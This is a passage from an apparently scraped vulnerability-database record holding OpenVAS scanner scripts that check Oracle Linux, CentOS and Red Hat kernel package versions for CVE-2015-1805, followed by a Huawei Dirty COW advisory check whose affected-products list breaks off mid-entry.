software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123108\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:28 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1042-1\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1042-1 - kernel security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1042-1\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1042-1.html\");\n script_cve_id(\"CVE-2015-1805\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", 
rpm:\"kernel~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.0.0.0.1.el5~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.0.0.0.1.el5PAE~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n 
if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.0.0.0.1.el5debug~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.0.0.0.1.el5xen~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.0.0.0.1.el5~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.0.0.0.1.el5PAE~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.0.0.0.1.el5debug~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.0.0.0.1.el5xen~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2015-06-09T00:00:00", "id": "OPENVAS:1361412562310882189", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882189", "type": "openvas", "title": "CentOS Update for kernel CESA-2015:1042 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2015:1042 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public 
License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882189\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2015-1805\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 11:03:54 +0200 (Tue, 09 Jun 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2015:1042 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\n kernel, the core of any Linux operating system.\n\n * It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. 
(CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs:\n\n * Due to a bug in the lpfc_device_reset_handler() function, a scsi command\ntimeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing. (BZ#1070964)\n\n * Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in the\nshrink_zone() function even though the vm.max_reclaims_in_progress feature\nwas set to 1. This update provides a patch fixing the underlying source\ncode, and spinlock contention no longer occurs in this scenario.\n(BZ#1164105)\n\n * A TCP socket using SACK that had a retransmission but recovered from it,\nfailed to reset the retransmission timestamp. As a consequence, on certain\nconnections, if a packet had to be re-transmitted, the retrans_stamp\nvariable was only cleared when the next acked packet was received.\nThis could lead to an early abortion of the TCP connection if this next\npacket also got lost. With this update, the socket clears retrans_stamp\nwhen the recovery is completed, thus fixing the bug. (BZ#1205521)\n\n * Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could cause problems in the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1193505)\n\n * A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and the\nkernel no longer crashes in this situation. (BZ#1124574)\n\n * Previously, when running the 'virsh blockresize [Device] [Newsize]'\ncommand to resize the disk, the new size was not reflected in a Red Hat\nEnterprise Linux 5 Virtual Machine (VM). 
With this update, the new size is\nnow reflected online immediately in a Red Hat Enterprise Linux 5 VM so it\nis no longer necessary to reboot the VM to see the new disk size.\n(BZ#1 ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1042\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-June/021156.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", 
rpm:\"kernel-headers~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-06-09T00:00:00", "id": "OPENVAS:1361412562310871365", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871365", "type": "openvas", "title": "RedHat Update for kernel RHSA-2015:1042-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2015:1042-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871365\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 11:01:05 +0200 (Tue, 09 Jun 2015)\");\n script_cve_id(\"CVE-2015-1805\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2015:1042-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n * It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. 
(CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs:\n\n * Due to a bug in the lpfc_device_reset_handler() function, a scsi command\ntimeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing. (BZ#1070964)\n\n * Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in the\nshrink_zone() function even though the vm.max_reclaims_in_progress feature\nwas set to 1. This update provides a patch fixing the underlying source\ncode, and spinlock contention no longer occurs in this scenario.\n(BZ#1164105)\n\n * A TCP socket using SACK that had a retransmission but recovered from it,\nfailed to reset the retransmission timestamp. As a consequence, on certain\nconnections, if a packet had to be re-transmitted, the retrans_stamp\nvariable was only cleared when the next acked packet was received.\nThis could lead to an early abortion of the TCP connection if this next\npacket also got lost. With this update, the socket clears retrans_stamp\nwhen the recovery is completed, thus fixing the bug. (BZ#1205521)\n\n * Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could cause problems in the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1193505)\n\n * A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and the\nkernel no longer crashes in this situation. (BZ#1124574)\n\n * Previously, when running the 'virsh blockresize [Device] [Newsize]'\ncommand to resize the disk, the new size was not reflected in a Red Hat\nEnterprise Linux 5 Virtual Machine (VM). 
With this update, the new size is\nnow reflected online immediately in a Red Hat Enterprise Linux 5 VM so it\nis no longer necessary to reboot the VM t ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1042-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-June/msg00001.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:45:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "In the morning of October 21th, 2016, a security researcher Phil Oester disclosed a local privilege 
escalation vulnerability in Linux kernel.", "modified": "2020-06-06T00:00:00", "published": "2020-06-05T00:00:00", "id": "OPENVAS:1361412562310108768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108768", "type": "openvas", "title": "Huawei Data Communication: Dirty COW Vulnerability in Huawei Products (huawei-sa-20161207-01-dirtycow)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108768\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-5195\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Dirty COW Vulnerability in Huawei Products (huawei-sa-20161207-01-dirtycow)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"In the morning of October 21th, 2016, a security researcher Phil Oester disclosed a local privilege escalation vulnerability in Linux kernel.\");\n\n script_tag(name:\"insight\", value:\"In the morning of October 21th, 2016, a security researcher Phil Oester disclosed a local privilege escalation vulnerability in Linux kernel. A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could exploit this vulnerability to gain write access to otherwise read-only memory mappings and thus obtain the highest privileges on the system. 
(Vulnerability ID: HWPSIRT-2016-10050)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2016-5195.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this vulnerability to escalate the privilege levels to obtain administrator privilege.\");\n\n script_tag(name:\"affected\", value:\"5288 V3 versions V100R003C00\n\n9032 versions V100R001C00 V100R001C00SPC101 V100R001C00SPC200\n\nAC6605 versions V200R006C00\n\nAgile Controller-Campus versions V100R002C00 V100R002C10 V100R002C10SPC400 V100R002C10SPC403\n\nAustin versions V100R001C10B290 V100R001C10B680 V100R001C20B110 V100R001C30 V100R001C50\n\nBH620 V2 versions V100R002C00\n\nBH621 V2 versions V100R002C00\n\nBH622 V2 versions V100R002C00\n\nBH640 V2 versions V100R002C00\n\nBalong GU versions V800R200C50B200 V800R200C55B200\n\nBalong GUL versions V700R110C30 V700R110C31 V700R200C00 V700R220C30 V700R500C30 V700R500C31\n\nCAM-L21 versions Versions earlier than C576B130\n\nCH121 V3 versions V100R001C00\n\nCH140 V3 versions V100R001C00\n\nCH220 V3 versions V100R001C00\n\nCH222 V3 versions V100R001C00\n\nCH225 V3 versions V100R001C00\n\nCH226 V3 versions V100R001C00\n\nCarrier-eLog versions V200R003C10\n\nChicago versions V100R001C10\n\nCloudOpera CSM versions SysTool(OSUpgrade)V200R016C10SPC100 SysTool(OSUpgrade)V200R016C10SPC100B021 V200R016C10SPC600\n\nDallas versions V100R001C10\n\nE5573Cs-609 versions Versions earlier than TCPU-V200R001B328D01SP00C00\n\nE5573s-320 versions TCPU-V200R001B180D11SP00C00\n\nE5673s-609 versions Versions earlier than TCPU-V200R001B328D01SP00C00\n\nE5771s-856 versions Versions earlier than TCPU-V200R001B329D07SP00C00\n\nE5878s-32 versions TCPU-V200R001B280D01SP05C00\n\nE6000 Chassis versions V100R001C00\n\nEnterprise Service Solution EIDC versions V100R001C60\n\nFusionCompute versions V100R003C10SPC600 V100R005C00 
V100R005C10 V100R005C10U1_B1075917\n\nFusionCube versions V100R002C60RC1\n\nFusionManager versions V100R003C00 V100R003C10 V100R005C00 V100R005C00SPC100 V100R005C00SPC200 V100R005C00SPC300 V100R005C10 V100R005C10SPC300 V100R005C10SPC500 V100R005C10SPC700 V100R005C10SPC703 V100R005C10SPC720T V100R005C10U1_B1075133 V100R005C10U2\n\nFusionStorage Block versions V100R003C00 V100R003C02 V100R003C30\n\nFusionStorage Object versions V100R002C00 V100R002C01\n\nHiDPTAndroid versions V200R001C00 V300R001C00\n\nHiSTBAndroid versions V600R003C00SPC010\n\nHuawei solutions for SAP HANA versions V100R001C00\n\nIPC6122-D versions V100R001C10\n\nIPC6611-Z30-I versions V100R001C00\n\nKII-L21 versions C10B130CUSTC10D003 C185B130CUSTC185D002 C185B140CUSTC185D004 C636B310CUSTC636D001 OTA-C02B131CUSTC02D002 OTA-C185B140CUSTC185D004 OTA-C185B310CUSTC185D004 OTA-C636B140CUSTC636D004 OTA-C636B310CUSTC636D001 OTA-C636B320CUSTC636D001 Versions earlier than C02B140CUSTC02D001 Versions earlier than C10B150CUSTC10D003 Versions earlier than C185B321CUSTC185D001 Versions earlier than C464B140 Versions earlier than C629B140CUSTC629D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B330CUSTC636D002 Versions earlier than C900B130 Versions earlier than C96B140CUSTC96D004\n\nL2800 versions V100R001C00SPC200\n\nLogCenter versions V100R001C10\n\nNEM-AL10 versions Versions earlier than C00B355\n\nNMO-L22 versions Versions earlier than C569B150\n\nOTA- versions KII-L21C636B150CUSTC636D005\n\nOceanStor 18500 versions V100R001C10\n\nOceanStor 18500 V3 versions V300R003C10\n\nOceanStor 18800 V3 versions V300R003C00\n\nOceanStor 5600 V3 versions V300R003C00 V300R003C10\n\nOceanStor Backup Software versions V100R002C00 V100R002C00LHWS01_P385795 V100R002C00SPC200 V200R001C00 V200R001C00SPC200\n\nOceanStor CSE versions V100R001C01SPC103 V100R001C01SPC106 V100R001C01SPC109 V100R001C01SPC112 
V100R002C00LSFM01CP0001 V100R002C00LSFM01SPC101 V100R002C00LSFM01SPC102 V100R002C00LSFM01SPC106\n\nOceanStor HDP3500E versions V100R002C00 V100R003C00\n\nOceanStor HVS85T versions V100R001C00 V100R001C10 V100R001C30\n\nOceanStor HVS88T versions V100R001C00\n\nOceanStor N8500 versions V200R001C09 V200R001C91 V200R001C91SPC900\n\nOceanStor Onebox versions V100R003C10\n\nOceanStor ReplicationDirector versions V200R001C00\n\nOnebox Solution versions V100R005C00 V1R5C00RC2\n\nRH1288 V2 versions V100R002C00\n\nRH1288 V3 versions V100R003C00\n\nRH1288A V2 versions V100R002C00\n\nRH2285 V2 versions V100R002C00\n\nRH2285H V2 versions V100R002C00\n\nRH2288 V2 versions V100R002C00\n\nRH2288 V3 versions V100R003C00\n\nRH2288A V2 versions V100R002C00\n\nRH2288E V2 versions V100R002C00\n\nRH2288H V2 versions V100R002C00\n\nRH2288H V3 versions V100R003C00\n\nRH2485 V2 versions V100R002C00\n\nRH5885 V3 versions V100R003C01 V100R003C10\n\nRH5885H V3 versions V100R003C00 V100R003C10\n\nRH8100 V3 versions V100R003C00\n\nV1300N versions V100R002C02\n\nVCM versions V100R001C00 V100R001C10 V100R001C20\n\nVIE-L29 